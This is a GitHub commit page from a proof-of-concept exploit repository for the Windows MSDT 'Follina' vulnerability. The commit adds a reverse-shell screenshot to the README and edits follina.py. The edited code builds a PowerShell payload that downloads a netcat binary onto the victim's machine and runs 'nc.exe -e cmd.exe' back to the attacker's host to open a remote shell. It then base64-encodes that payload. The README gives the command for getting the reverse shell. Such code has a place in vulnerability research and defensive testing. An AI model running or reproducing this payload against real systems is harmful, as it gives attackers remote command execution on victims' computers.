Skip to content

Commit

Permalink
Adding screenshot for reverse shell
Browse files Browse the repository at this point in the history
  • Loading branch information
JohnHammond committed May 30, 2022
1 parent 7f87da2 commit bb0cd62
Show file tree
Hide file tree
Showing 2 changed files with 2 additions and 2 deletions.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -47,4 +47,4 @@ Get a reverse shell on port 9001. **Note, this downloads a netcat binary _onto t
$ python3 follina.py -r 9001
```

This comment has been minimized.

Copy link
@mohebbibrothers

mohebbibrothers Jul 19, 2022

nice


https://user-images.githubusercontent.com/6288722/171037880-03a73d6a-4606-4c42-abcb-ee52a9e669c6.png
![Reverse Shell](https://user-images.githubusercontent.com/6288722/171037880-03a73d6a-4606-4c42-abcb-ee52a9e669c6.png)
2 changes: 1 addition & 1 deletion follina.py
Original file line number Diff line number Diff line change
Expand Up @@ -108,7 +108,7 @@ def main(args):

command = args.command
if args.reverse:
command = f"""Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/master/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
command = f"""Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""

# Base64 encode our command so whitespace is respected
base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")
Expand Down

0 comments on commit bb0cd62

Please sign in to comment.